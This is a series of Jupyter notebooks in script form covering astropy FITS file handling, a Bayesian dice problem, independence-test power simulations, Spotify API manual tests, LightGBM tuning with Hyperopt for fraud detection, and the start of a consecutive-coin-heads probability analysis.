# <section class="objectives panel panel-warning">
# <div class="panel-heading">
# <h2><span class="fa fa-certificate"></span> Objectives</h2>
# </div>
#
#
# <div class="panel-body">
#
# <ul>
# <li>Read image FITS files and access data and header</li>
# <li>Read tabular FITS files and access data and header</li>
# <li>Construct new FITS files from scratch</li>
# </ul>
#
# </div>
#
# </section>
#
# ## Documentation
#
# This notebook only shows a subset of the functionality in astropy.io.fits. For more information about the features presented below as well as other available features, you can read the
# [astropy.io.fits documentation](https://docs.astropy.org/en/stable/io/fits/).
# %matplotlib inline
import matplotlib.pyplot as plt
plt.rc('image', origin='lower')
plt.rc('figure', figsize=(10, 6))
# ## Data
#
# For this tutorial we will be using the ``LMCDensFits1k.fits`` FITS file which was downloaded from http://www.sim.ul.pt/gaia/dr1/gallery/. This file contains the density of sources in the Gaia DR1 release towards the Large Magellanic Cloud (LMC). In addition, we will use the ``gaia_lmc_psc.fits`` file which contains the result of a table query in the GAIA archive.
# ## Reading FITS files and accessing data
#
# To open a FITS file, use the ``fits.open`` function:
# The returned object, ``hdulist``, behaves like a Python list, and each element maps to a Header-Data Unit (HDU) in the FITS file. You can view more information about the FITS file with:
# As we can see, this file contains only one HDU. Accessing this HDU can then either be done by index:
# or by name:
# The ``hdu`` object then has two important attributes: ``data``, which behaves like a Numpy array, can be used to access the data, and ``header``, which behaves like a dictionary, can be used to access the header information. First, we can take a look at the data:
# This tells us that it is a 2-d image. We can now take a peek at the header:
# which shows that this is an Orthographic (``-SIN``) projection in Galactic Coordinates. We can access individual
# header keywords using standard item notation:
# We can now take a look at the data using Matplotlib:
# Note that this is just a plot of an array, so the coordinates are just pixel coordinates at this stage.
#
# Modifying data or header information in a FITS file object is easy. For example we can add new keywords with:
# We can also modify the data by extracting a subset for example:
# and updating the CRPIX values accordingly in the header:
# We can now write out the HDU list back to disk:
# or if you were dealing with a multi-HDU file and wanted to just output the HDU you were editing:
# ## Creating a FITS file from scratch
#
# If you want to create a FITS file from scratch, you need to start off by creating an HDU object:
# and you can then populate the data and header attributes with whatever information you like, for example random data:
# Note that setting the data automatically populates the header with basic information:
# and you should never have to set header keywords such as ``NAXIS``, ``NAXIS1``, and so on manually. We can then set additional header keywords:
# and we can then write out the FITS file to disk:
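# The code cells are missing from this copy of the notebook, so here is a minimal self-contained sketch of the from-scratch workflow just described. The array shape and the `TELESCOP` keyword are illustrative, not from the original notebook:

```python
import os
import tempfile

import numpy as np
from astropy.io import fits

# Create an HDU with random data; NAXIS, NAXIS1, ... are filled in automatically.
hdu = fits.PrimaryHDU(data=np.random.random((64, 64)))
hdu.header['TELESCOP'] = 'Gaia'  # an extra keyword, set manually

# Write the file to disk, then read it back.
path = os.path.join(tempfile.mkdtemp(), 'example.fits')
hdu.writeto(path)

with fits.open(path) as hdulist:
    naxis = hdulist[0].header['NAXIS']        # 2, set automatically from the data
    telescop = hdulist[0].header['TELESCOP']  # 'Gaia'
    shape = hdulist[0].data.shape             # (64, 64)
```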
# ## Convenience functions
#
# In cases where you just want to access the data or header in a specific HDU, you can use the following convenience functions:
# You can optionally specify the index or name of the HDU to look at (which is important if you are dealing with a multi-HDU file):
# and similarly for ``getheader``.
# ## Accessing Tabular Data
#
# Let's now take a look at a tabular dataset - this is a subset of sources from the GAIA DR1 release around the LMC, and only includes the brightest sources in Gmag:
# Here we have two HDUs - the first one is mostly empty and the second contains the table (the primary HDU can't contain a table in general).
#
# Tabular data behaves very similarly to image data such as that shown above, but the data array is a structured Numpy array:
#
# <section class="challenge panel panel-success">
# <div class="panel-heading">
# <h2><span class="fa fa-pencil"></span> Challenge</h2>
# </div>
#
#
# <div class="panel-body">
#
# <ol>
# <li>Examine the headers of the first and second HDU in the point source catalog and try adding new keywords to them or changing them</li>
# <li>Make a histogram of the G-band magnitude of the sources in the catalog - can you figure out what the upper limit for Gmag was when the table was selected?</li>
# <li>Make a plot of the position of the sources on the sky in the point source catalog, in Galactic coordinates l and b (you will need to use what we learned about SkyCoord in the previous tutorial)</li>
# <li>Try and produce a new FITS file that contains the image in the primary HDU and the above table in the second HDU</li>
# </ol>
#
# </div>
#
# </section>
#
# <center><i>This notebook was written by <a href="https://aper<EMAIL>/">Aperio Software Ltd.</a> © 2019, and is licensed under a <a href="https://creativecommons.org/licenses/by/4.0/">Creative Commons Attribution 4.0 International License (CC BY 4.0)</a></i></center>
#
# 
|
04-fits.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Think Bayes
#
# This notebook presents example code and exercise solutions for Think Bayes.
#
# Copyright 2018 <NAME>
#
# MIT License: https://opensource.org/licenses/MIT
# +
# Configure Jupyter so figures appear in the notebook
# %matplotlib inline
# Configure Jupyter to display the assigned value after an assignment
# %config InteractiveShell.ast_node_interactivity='last_expr_or_assign'
# import classes from thinkbayes2
from thinkbayes2 import Pmf, Suite
import thinkbayes2
import thinkplot
# -
# ### The Dungeons and Dragons club
#
# Suppose there are 10 people in my *Dungeons and Dragons* club; on any game day, each of them has a 70% chance of showing up.
#
# Each player has one character and each character has 6 attributes, each of which is generated by rolling and adding up 3 6-sided dice.
#
# At the beginning of the game, I ask whose character has the lowest attribute. The wizard says, "My constitution is 5; does anyone have a lower attribute?", and no one does.
#
# The warrior says "My strength is 16; does anyone have a higher attribute?", and no one does.
#
# How many characters are in the party?
# ### The prior
#
# There are three ways to compute the prior distribution:
#
# * Simulation
#
# * Convolution
#
# * Analytic distribution
#
# First, simulation. Here's a function that flips a coin with probability `p`:
# +
from random import random
def flip(p):
return random() < p
# -
# We can use it to flip a coin for each member of the club.
flips = [flip(0.7) for i in range(10)]
# And count the number that show up on game day.
sum(flips)
# Let's encapsulate that in a function that simulates a game day.
def game_day(n, p):
flips = [flip(p) for i in range(n)]
return sum(flips)
game_day(10, 0.7)
# If we run that function many times, we get a sample from the distribution of the number of players.
sample = [game_day(10, 0.7) for i in range(1000)]
pmf_sample = Pmf(sample)
thinkplot.Hist(pmf_sample)
# The second method is convolution. Instead of flipping a coin, we can create a `Pmf` object that represents the distribution of outcomes from a single flip.
def coin(p):
return Pmf({1:p, 0:1-p})
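# Under the hood, adding two `Pmf` objects is a discrete convolution. Here is a dependency-free sketch of the same operation, using plain dicts instead of the `Pmf` class:

```python
def convolve(pmf1, pmf2):
    """Distribution of the sum of two independent discrete variables."""
    out = {}
    for v1, p1 in pmf1.items():
        for v2, p2 in pmf2.items():
            out[v1 + v2] = out.get(v1 + v2, 0.0) + p1 * p2
    return out

coin_pmf = {1: 0.7, 0: 0.3}
two_players = convolve(coin_pmf, coin_pmf)
print(two_players)  # approximately {2: 0.49, 1: 0.42, 0: 0.09}
```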
# Here's what it looks like.
player = coin(0.7)
player.Print()
# If we have two players, there are three possible outcomes:
(player + player).Print()
# If we have 10 players, we can get the prior distribution like this:
prior = sum([player]*10)
prior.Print()
# Now we can compare the results of simulation and convolution:
# +
thinkplot.Hist(pmf_sample, color='C0')
thinkplot.Pmf(prior, color='C1')
thinkplot.decorate(xlabel='Number of players',
ylabel='PMF')
# -
# Finally, we can use an analytic distribution. The distribution we just computed is the [binomial distribution](https://en.wikipedia.org/wiki/Binomial_distribution), which has the following PMF:
#
# $ PMF(k; n, p) = P(k ~|~ n, p) = {n \choose k}\,p^{k}(1-p)^{n-k}$
#
# We could evaluate the right-hand side in Python, or use `MakeBinomialPmf`:
#
#
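# The right-hand side can also be evaluated directly with the standard library; a quick sketch, independent of `thinkbayes2`:

```python
from math import comb

def binomial_pmf(k, n, p):
    """P(k successes in n independent trials, each with success probability p)."""
    return comb(n, k) * p**k * (1 - p)**(n - k)

pmf = {k: binomial_pmf(k, 10, 0.7) for k in range(11)}
assert abs(sum(pmf.values()) - 1.0) < 1e-12  # a PMF sums to 1
print(round(pmf[7], 4))  # 0.2668 -- the most likely number of players
```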
help(thinkbayes2.MakeBinomialPmf)
# And we can confirm that the analytic result matches what we computed by convolution.
# +
binomial = thinkbayes2.MakeBinomialPmf(10, 0.7)
thinkplot.Pmf(prior, color='C1')
thinkplot.Pmf(binomial, color='C2', linestyle='dotted')
thinkplot.decorate(xlabel='Number of players',
ylabel='PMF')
# -
# Since two players spoke, we can eliminate the possibility of 0 or 1 players:
# +
thinkplot.Pmf(prior, color='gray')
del prior[0]
del prior[1]
prior.Normalize()
thinkplot.Pmf(prior, color='C1')
thinkplot.decorate(xlabel='Number of players',
ylabel='PMF')
# -
# ### Likelihood
#
# There are three components of the likelihood function:
#
# * The probability that the highest attribute is 16.
#
# * The probability that the lowest attribute is 5.
#
# * The probability that the lowest and highest attributes are held by different players.
#
# To compute the first component, we have to compute the distribution of the maximum of $6n$ attributes, where $n$ is the number of players.
#
# Here is the distribution for a single die.
d6 = Pmf([1,2,3,4,5,6])
d6.Print()
# And here's the distribution for the sum of three dice.
thrice = sum([d6] * 3)
thinkplot.Pdf(thrice)
thinkplot.decorate(xlabel='Attribute',
ylabel='PMF')
# Here's the CDF for the sum of three dice.
cdf_thrice = thrice.MakeCdf()
thinkplot.Cdf(cdf_thrice)
thinkplot.decorate(xlabel='Attribute',
ylabel='CDF')
# The `Max` method raises the CDF to a power. So here's the CDF for the maximum of six attributes.
cdf_max_6 = cdf_thrice.Max(6)
thinkplot.Cdf(cdf_max_6)
thinkplot.decorate(xlabel='Attribute',
ylabel='CDF',
title='Maximum of 6 attributes')
# If there are `n` players, there are `6*n` attributes. Here are the distributions for the maximum attribute of `n` players, for a few values of `n`.
# +
for n in range(2, 10, 2):
cdf_max = cdf_thrice.Max(n*6)
thinkplot.Cdf(cdf_max, label='n=%s'%n)
thinkplot.decorate(xlabel='Attribute',
ylabel='CDF',
title='Maximum of 6*n attributes')
# -
# To check that, I'll compute the CDF for 7 players, and estimate it by simulation.
# +
n = 7
cdf = cdf_thrice.Max(n*6)
thinkplot.Cdf(cdf, label='n=%s'%n)
sample_max = [max(cdf_thrice.Sample(42)) for i in range(1000)]
thinkplot.Cdf(thinkbayes2.Cdf(sample_max), label='sample')
thinkplot.decorate(xlabel='Attribute',
ylabel='CDF',
title='Maximum of 6*n attributes')
# -
# Looks good.
#
# Now, to compute the minimum, I have to write my own function, because `Cdf` doesn't provide a `Min` function.
def compute_cdf_min(cdf, k):
"""CDF of the min of k samples from cdf.
cdf: Cdf object
k: number of samples
returns: new Cdf object
"""
cdf_min = cdf.Copy()
cdf_min.ps = 1 - (1 - cdf_min.ps)**k
return cdf_min
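# The identity `F_min(x) = 1 - (1 - F(x))**k` used above can be verified exactly for a small case by brute-force enumeration (standalone; no `Cdf` class needed):

```python
from itertools import product

def die_cdf(x):
    """CDF of a single fair six-sided die: F(x) = x / 6."""
    return x / 6

k = 2
for x in range(1, 7):
    # Exhaustive: P(min of k dice <= x) over all 6**k equally likely outcomes.
    exact = sum(min(roll) <= x for roll in product(range(1, 7), repeat=k)) / 6**k
    formula = 1 - (1 - die_cdf(x))**k
    assert abs(exact - formula) < 1e-12
print("min-CDF identity verified for k =", k)
```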
# Now we can compute the CDF of the minimum attribute for `n` players, for several values of `n`.
# +
for n in range(2, 10, 2):
cdf_min = compute_cdf_min(cdf_thrice, n*6)
thinkplot.Cdf(cdf_min, label='n=%s'%n)
thinkplot.decorate(xlabel='Attribute',
ylabel='CDF',
title='Minimum of 6*n attributes')
# -
# And again we can check it by comparing to simulation results.
# +
n = 7
cdf = compute_cdf_min(cdf_thrice, n*6)
thinkplot.Cdf(cdf, label='n=%s'%n)
sample_min = [min(cdf_thrice.Sample(42)) for i in range(1000)]
thinkplot.Cdf(thinkbayes2.Cdf(sample_min), label='sample')
thinkplot.decorate(xlabel='Attribute',
ylabel='CDF',
title='Minimum of 6*n attributes')
# -
# For efficiency and conciseness, it is helpful to precompute the distributions for the relevant values of `n`, and store them in dictionaries.
# +
like_min = {}
like_max = {}
for n in range(2, 11):
cdf_min = compute_cdf_min(cdf_thrice, n*6)
like_min[n] = cdf_min.MakePmf()
cdf_max = cdf_thrice.Max(n*6)
like_max[n] = cdf_max.MakePmf()
print(like_min[n][5], like_max[n][16])
# -
# The output shows that the particular data we saw is symmetric: the chance that 16 is the maximum is the same as the chance that 5 is the minimum.
#
# Finally, we need the probability that the minimum and maximum are held by the same person. If there are `n` players, there are `6*n` attributes.
#
# Let's call the player with the highest attribute Max. What is the chance that Max also has the lowest attribute? Well, Max has 5 more attributes, out of a total of `6*n-1` remaining attributes.
#
# So here's `prob_same` as a function of `n`.
# +
def prob_same(n):
return 5 / (6*n-1)
for n in range(2, 11):
print(n, prob_same(n))
# -
# ### The update
# Here's a class that implements this likelihood function.
class Dungeons(Suite):
def Likelihood(self, data, hypo):
"""Probability of the data given the hypothesis.
data: lowest attribute, highest attribute, boolean
(whether the same person has both)
hypo: number of players
returns: probability
"""
lowest, highest, same = data
n = hypo
p = prob_same(n)
like = p if same else 1-p
like *= like_min[n][lowest]
like *= like_max[n][highest]
return like
# Here's the prior we computed above.
suite = Dungeons(prior)
thinkplot.Hist(suite)
thinkplot.decorate(xlabel='Number of players',
ylabel='PMF')
suite.Mean()
# And here's the update based on the data in the problem statement.
suite.Update((5, 16, False))
# Here's the posterior.
thinkplot.Hist(suite)
thinkplot.decorate(xlabel='Number of players',
ylabel='PMF')
suite.Mean()
suite.Print()
# Based on the data, I am 94% sure there are between 5 and 9 players.
suite.CredibleInterval()
sum(suite[n] for n in [5,6,7,8,9])
|
examples/dungeons_soln.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import sys, os
from joblib import Parallel, delayed
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from hyppo.tools import power
# +
sys.path.append(os.path.realpath('..'))
sns.set(color_codes=True, style='white', context='talk', font_scale=1.5)
PALETTE = sns.color_palette("Set1")
sns.set_palette(PALETTE[1:5] + PALETTE[6:], n_colors=9)
POWER_REPS = 5
SIMULATIONS = {
# "linear": ("Linear", 1000),
# "exponential": ("Exponential", 1000),
# "cubic": ("Cubic", 1000),
# "joint_normal": ("Joint Normal", 10),
# "step": ("Step", 20),
# "quadratic": ("Quadratic", 20),
# "w_shaped": ("W-Shaped", 20),
# "spiral": ("Spiral", 20),
# "uncorrelated_bernoulli": ("Bernoulli", 100),
"logarithmic": ("Logarithmic", 100),
# "fourth_root": ("Fourth Root", 20),
# "sin_four_pi": ("Sine 4\u03C0", 10),
# "sin_sixteen_pi": ("Sine 16\u03C0", 10),
# "square": ("Square", 40),
# "two_parabolas": ("Two Parabolas", 20),
# "circle": ("Circle", 20),
# "ellipse": ("Ellipse", 20),
# "diamond": ("Diamond", 40),
# "multiplicative_noise": ("Multiplicative", 10),
"multimodal_independence": ("Independence", 100)
}
TESTS = [
["MaxMargin", "Dcorr"],
# "KMERF",
# "MGC",
# "Dcorr",
# "Hsic",
# "HHG",
# "CCA",
# "RV",
]
# -
def find_dim_range(dim):
lim = 10 if dim < 20 else 20
dim_range = list(range(int(dim/lim), dim+1, int(dim/lim)))
if int(dim/lim) != 1:
dim_range.insert(0, 1)
return dim_range
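# As a quick sanity check of the helper above (restated here so the cell runs standalone): for `dim=100`, `lim` is 20, the step is `100/20 = 5`, and a leading 1 is prepended.

```python
def find_dim_range(dim):
    lim = 10 if dim < 20 else 20
    step = int(dim / lim)
    dim_range = list(range(step, dim + 1, step))
    if step != 1:
        dim_range.insert(0, 1)
    return dim_range

print(find_dim_range(100))  # [1, 5, 10, 15, ..., 95, 100]
print(find_dim_range(10))   # [1, 2, 3, ..., 10]
```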
def estimate_power(sim, test):
dim_range = find_dim_range(SIMULATIONS[sim][1])
est_power = np.array(
[
np.mean(
[
power(test, sim_type="indep", sim=sim, n=100, p=i, noise=False, auto=True)
for _ in range(POWER_REPS)
]
)
for i in dim_range
]
)
test = test[0] if type(test) is list else test
np.savetxt(
"../max_margin/vs_dimension/{}_{}.csv".format(sim, test),
est_power,
delimiter=",",
)
return est_power
outputs = Parallel(n_jobs=-1, verbose=100)(
[delayed(estimate_power)(sim, test) for sim in SIMULATIONS.keys() for test in TESTS]
)
def plot_power():
fig, ax = plt.subplots(nrows=4, ncols=5, figsize=(25, 20))
plt.suptitle(
"Multivariate Independence Testing (Increasing Dimension)",
y=0.93,
va="baseline",
)
for i, row in enumerate(ax):
for j, col in enumerate(row):
count = 5 * i + j
if count in [9, 18, 19]:
continue
sim = list(SIMULATIONS.keys())[count]
for test in TESTS:
title, dim = SIMULATIONS[sim]
dim_range = find_dim_range(dim)
test = test[0] if type(test) is list else test
power = np.genfromtxt(
"../max_margin/vs_dimension/{}_{}.csv".format(sim, test),
delimiter=",",
)
kwargs = {
"label": test,
"lw": 2,
}
if test in ["MaxMargin"]:
kwargs["color"] = "#e41a1c"
kwargs["lw"] = 4
col.plot(dim_range, power, **kwargs)
col.set_xticks([dim_range[0], dim_range[-1]])
col.set_ylim(-0.05, 1.05)
col.set_yticks([])
if j == 0:
col.set_yticks([0, 1])
col.set_title(title)
fig.text(0.5, 0.07, "Dimension", ha="center")
fig.text(
0.07,
0.5,
"Absolute Power",
va="center",
rotation="vertical",
)
leg = plt.legend(
bbox_to_anchor=(0.5, 0.07),
bbox_transform=plt.gcf().transFigure,
ncol=len(TESTS),
loc="upper center",
)
leg.get_frame().set_linewidth(0.0)
for legobj in leg.legendHandles:
legobj.set_linewidth(5.0)
plt.subplots_adjust(hspace=0.50)
plt.savefig(
"../max_margin/figs/indep_power_dimension.pdf", transparent=True, bbox_inches="tight"
)
plot_power()
|
max_margin/indep_power_dimension.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# +
import os
import json
import spotipy as sp
from spotipy.oauth2 import SpotifyOAuth
from pprint import pprint
import random
# +
SPOTIFY_USER_ID = os.environ.get("SPOTIFY_USER_ID")
SPOTIFY_CLIENT_ID = os.environ.get("SPOTIFY_CLIENT_ID")
SPOTIFY_CLIENT_SECRET = os.environ.get("SPOTIFY_CLIENT_SECRET")
SPOTIFY_REDIRECT_URI = os.environ.get("SPOTIFY_REDIRECT_URI")
states = [
"user-modify-playback-state",
"user-read-playback-state",
"user-library-read",
"playlist-read-private",
"playlist-read-collaborative",
"playlist-modify-public",
"playlist-modify-private",
"user-read-recently-played",
]
STATE_STR = " ".join(states)
# -
sp_auth = sp.Spotify(
auth_manager=SpotifyOAuth(
client_id=SPOTIFY_CLIENT_ID,
client_secret=SPOTIFY_CLIENT_SECRET,
redirect_uri=SPOTIFY_REDIRECT_URI,
scope=STATE_STR
)
)
sp_auth.devices()
playlist_items = sp_auth.playlist_items(fields="items(track(album(album_type,type,artists(name),name,total_tracks,uri,release_date)))", playlist_id="https://open.spotify.com/playlist/37i9dQZEVXbieEVQVJcsiF?si=0839594a9c684a3c")
pprint(playlist_items["items"][0])
sp_auth.current_user_saved_albums_contains(albums=['spotify:album:492aRRC7C55aoT9NX7NrxJ'])
def get_artist_names(res):
"""
Retrieve all artist names from the "album" object of a response and join them into a comma-separated string.
"""
artists = []
for artist in res["artists"]:
artists.append(artist["name"])
artists_str = ", ".join(artists)
return artists_str
# +
# %%time
from tabulate import tabulate
# check_url_format(url)
# playlist_items = sp_auth.playlist_items(playlist_id=url, fields=fields)
album_items = []
index = 0
for item in playlist_items["items"]:
item_album = item["track"]["album"]
if item_album["total_tracks"] > 1 and item_album["album_type"] == "single":
is_album_saved = sp_auth.current_user_saved_albums_contains(albums=[item_album["uri"]])
if is_album_saved[0]:
album_items.append(
{
"index": index,
"artists": get_artist_names(item_album),
"album": item_album["name"],
"album_type": "EP",
"album_uri": item_album["uri"],
"release_date": item_album["release_date"],
"total_tracks": item_album["total_tracks"]
}
)
index += 1
elif item_album["album_type"] == "album":
is_album_saved = sp_auth.current_user_saved_albums_contains(albums=[item_album["uri"]])
if is_album_saved[0]:
album_items.append(
{
"index": index,
"artists": get_artist_names(item_album),
"album": item_album["name"],
"album_type": item_album["album_type"],
"album_uri": item_album["uri"],
"release_date": item_album["release_date"],
"total_tracks": item_album["total_tracks"]
}
)
index += 1
# click.echo(tabulate(album_items, headers="keys", tablefmt="github"))
album_items
# +
# %%time
from tabulate import tabulate
# check_url_format(url)
# playlist_items = sp_auth.playlist_items(playlist_id=url, fields=fields)
album_items = []
index = 0
for item in playlist_items["items"]:
item_album = item["track"]["album"]
is_album_saved = sp_auth.current_user_saved_albums_contains(albums=[item_album["uri"]])
if is_album_saved[0]:
if item_album["total_tracks"] > 1 and item_album["album_type"] == "single":
album_items.append(
{
"index": index,
"artists": get_artist_names(item_album),
"album": item_album["name"],
"album_type": "EP",
"album_uri": item_album["uri"],
"release_date": item_album["release_date"],
"total_tracks": item_album["total_tracks"]
}
)
index += 1
        elif item_album["album_type"] == "album":
            # is_album_saved was already checked above, so no second lookup is needed
            album_items.append(
                {
                    "index": index,
                    "artists": get_artist_names(item_album),
                    "album": item_album["name"],
                    "album_type": item_album["album_type"],
                    "album_uri": item_album["uri"],
                    "release_date": item_album["release_date"],
                    "total_tracks": item_album["total_tracks"]
                }
            )
            index += 1
# click.echo(tabulate(album_items, headers="keys", tablefmt="github"))
album_items
# -
playback = sp_auth.current_playback()
pprint(playback)
sp_auth.transfer_playback(device_id='884b71d1e7db094099a4975f0ddfefb7d10fc8c7', force_play=True)
f = open("current_playback_res.json", "w")
f.write(json.dumps(playback, indent=4))
f.close()
from spoticli.util import get_current_playback, convert_ms, convert_datetime
from pathlib import Path
# +
path = Path("../../test/unit/artifacts/current_playback_res.json")
f = open(path)
res = json.load(f)
get_current_playback(res, False)
# -
convert_ms(600000)
convert_datetime("20210813 20:01")
convert_datetime("20200403 13:37")
"<NAME> & The Indications, <NAME>"[0:35]
playback = {}
import json
|
tests/manual/Manual Tests.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# Training LightGBM on the fraud dataset.
# - SMOTE for Upsampling
# - F1 score for metric
# - using early stopping
# - Hyperopt for hyperparameter optimization
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
from imblearn.over_sampling import SMOTE, ADASYN, BorderlineSMOTE, SVMSMOTE
from imblearn.combine import SMOTETomek, SMOTEENN
import lightgbm as lgb
import sklearn
from hyperopt import fmin, tpe, hp, Trials, STATUS_OK
from sklearn.metrics import f1_score
x_train = pd.read_csv('./data/x_train.csv').values
y_train = pd.read_csv('./data/y_train.csv').values[:,0]
x_test = pd.read_csv('./data/x_test.csv').values
y_test = pd.read_csv('./data/y_test.csv').values[:,0]
# +
x_train_resampled, y_train_resampled = SMOTE(random_state = 42).fit_resample(x_train, y_train)
print('#pos labels before resampling:', sum(y_train == 1))
print('#neg labels before resampling:', sum(y_train == 0))
print('#pos labels after resampling:', sum(y_train_resampled == 1))
print('#neg labels after resampling:', sum(y_train_resampled == 0))
# -
train_data = lgb.Dataset(x_train_resampled, label=y_train_resampled)
test_data = lgb.Dataset(x_test, label=y_test)
def lgb_f1_score(y_hat, data):
y_true = data.get_label()
y_hat = np.round(y_hat) # scikits f1 doesn't like probabilities
return 'f1', f1_score(y_true, y_hat), True
# +
def objective(params):
#print(params)
evals_result = {}
num_leaves = int(params['num_leaves'])
min_data_in_leaf = int(params['min_data_in_leaf'])
max_bin = int(params['max_bin'])
bagging_fraction = params['bagging_fraction']
bagging_freq = int(params['bagging_freq'])
feature_fraction = params['feature_fraction']
    lambda_l2 = params['lambda_l2']  # no trailing comma: a comma here would make this a tuple
min_gain_to_split = params['min_gain_to_split']
param = {'num_leaves':num_leaves,
'min_data_in_leaf':min_data_in_leaf,
'max_bin':max_bin,
'learning_rate':0.1,
'num_trees':1000,
'objective':'binary',
'bagging_fraction':bagging_fraction,
'bagging_freq':bagging_freq,
'feature_fraction':feature_fraction,
'verbose':-1,
'lambda_l2':lambda_l2,
'min_gain_to_split':min_gain_to_split,
#'metric' : 'binary_logloss' # map, MAP, aliases: mean_average_precision
}
bst = lgb.train(param,
train_data,
valid_sets=[test_data],
early_stopping_rounds=15,
verbose_eval=False,
feval=lgb_f1_score,
evals_result=evals_result,
)
f1 = max(evals_result['valid_0']['f1'])
return -f1
# +
trials = Trials()
space = {
'num_leaves' : hp.quniform('num_leaves', 100, 600, 10),
'min_data_in_leaf' : hp.quniform('min_data_in_leaf', 10, 30, 1),
'max_bin' : hp.quniform('max_bin', 200, 2000, 10),
'bagging_fraction' : hp.uniform('bagging_fraction', 0.01, 1.0),
'bagging_freq' : hp.quniform('bagging_freq', 0, 10, 1),
'feature_fraction' : hp.uniform('feature_fraction', 0.5, 1.0),
'lambda_l2' : hp.uniform('lambda_l2', 0.0, 80.0),
'min_gain_to_split' : hp.uniform('min_gain_to_split', 0.0, 1.0),
}
best = fmin(objective,
space=space,
algo=tpe.suggest,
trials=trials,
max_evals=800)
print('#best', best)
print('#min(trials.losses())', min(trials.losses()))
# +
#16%|█▌ | 125/800 [11:27<1:14:11, 6.59s/it, best loss: -0.8469387755102041]
#19%|█▉ | 153/800 [14:15<1:11:37, 6.64s/it, best loss: -0.8514851485148514]
#20%|██ | 160/800 [15:07<1:18:03, 7.32s/it, best loss: -0.8571428571428571]
#40%|████ | 321/800 [31:41<52:51, 6.62s/it, best loss: -0.8615384615384615]
#60%|█████▉ | 479/800 [47:53<34:38, 6.48s/it, best loss: -0.864321608040201]
#90%|█████████ | 724/800 [1:13:52<09:38, 7.61s/it, best loss: -0.8659793814432989]
#100%|██████████| 800/800 [1:22:28<00:00, 6.72s/it, best loss: -0.8659793814432989]
#best {'bagging_fraction': 0.7589063217431224, 'bagging_freq': 3.0, 'feature_fraction': 0.9971560184326493, 'lambda_l2': 0.03681947685513025, 'max_bin': 1970.0, 'min_data_in_leaf': 30.0, 'min_gain_to_split': 0.00047339850140067086, 'num_leaves': 500.0}
#min(trials.losses()) -0.8659793814432989
|
LightGBM_with_Hyperopt.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# To properly render this notebook go to:
# [nbviewer](https://nbviewer.jupyter.org/github/mtzoufras/probabilities/blob/master/Consecutive_heads.ipynb)
# ### <font color='red'>What is the probability P of getting N consecutive heads at least once in K tosses of a fair coin?</font>
#
# __Quick answer:__ The exact result is $P=1-F_{K+2}^{(N)}/2^K$, where $F_{K+2}^{(N)}$ is the Fibonacci N-step number. For a good approximation I calculate $x = \frac{K-N+2}{2^{N+1}}$ and if $x\lesssim 0.1$ then $P\simeq x$, else $P\simeq 1-e^{-x}$.
#
# __Corollary:__ This yields an approximate expression for the Fibonacci N-step number: $F_{K+2}^{(N)} \simeq 2^K \exp\left(-\frac{K-N+2}{2^{N+1}}\right)$
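# A quick numerical check of the corollary (a sketch I am adding here; `fib_nstep` is my own helper name, not part of the original analysis): for moderate $N$ the approximation tracks the exact Fibonacci N-step value closely.

```python
import math

def fib_nstep(N, K):
    """F_{K+2}^{(N)}: the number of K-toss sequences with no run of N heads."""
    S = [2 ** k for k in range(N)] + [2 ** N - 1]  # S_k = 2^k for k < N, S_N = 2^N - 1
    for k in range(N + 1, K + 1):
        S.append(sum(S[-N:]))                      # S_k = sum of the previous N terms
    return S[K]

N, K = 10, 100
exact = fib_nstep(N, K)
approx = 2 ** K * math.exp(-(K - N + 2) / 2 ** (N + 1))
print(abs(approx / exact - 1))  # small relative error
```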
#
# ### Introduction
#
# This question shows up a lot online. For example:
# * Quora:
# * [Run of 5 in 11](https://www.quora.com/What-is-the-probability-of-getting-5-consecutive-heads-in-11-tosses-of-a-fair-coin)
# * [Run of 5 in 10](https://www.quora.com/What-is-the-probability-of-getting-5-consecutive-heads-in-10-tosses-of-a-fair-coin)
# * PhysicsForums:
# * [Run of 15 in 40](https://www.physicsforums.com/threads/what-is-the-probability-of-getting-15-or-more-consecutive-heads-over-40-coin-tosses.331603/)
# * Math.StackExchange:
# * [Run of 20 in 100](https://math.stackexchange.com/questions/417762/probability-of-20-consecutive-success-in-100-runs)
# * [Run of 7 in 150](https://math.stackexchange.com/questions/4658/what-is-the-probability-of-a-coin-landing-tails-7-times-in-a-row-in-a-series-of)
# * DrDobbs:
# * [Run of 20 in 1,000,000](http://www.drdobbs.com/architecture-and-design/20-heads-in-a-row-what-are-the-odds/229300217)
#
# The answer is usually given in terms of the [_Fibonacci N-step_](http://mathworld.wolfram.com/Fibonaccin-StepNumber.html) sequence. The derivation is straightforward (see the Appendix at the bottom), but since the Fibonacci number is not an explicit function of the variables N and K, the resulting formula is very opaque. Here I will show a couple of simple semi-analytical expressions and discuss their accuracy:
# 1. $P \simeq 1 - \exp\left(-\frac{K-N+2}{2^{N+1}}\right)$, with accuracy that generally improves with increasing $N,K$
# 2. If $\frac{K-N+2}{2^{N+1}}\ll 1$ then $P \simeq \frac{K-N+2}{2^{N+1}}$.
#
# Before proceeding let's see what these expressions predict for the aforementioned examples:
# +
import numpy as np
import plotly.plotly as py
import plotly.figure_factory as ff
def fiblike(start):
"""A function that returns a Fibonacci N-step function, where N
is the length of the input list "start". Code from rosettacode.org"""
addnum = len(start)
memo = start[:]
def fibber(n):
try:
return memo[n]
except IndexError:
ans = sum(fibber(i) for i in range(n-addnum, n))
memo.append(ans)
return ans
return fibber
def Fibonacci_formatted(_N,_K):
"""Formatted result from Fibonacci(N,K) calculation for use below"""
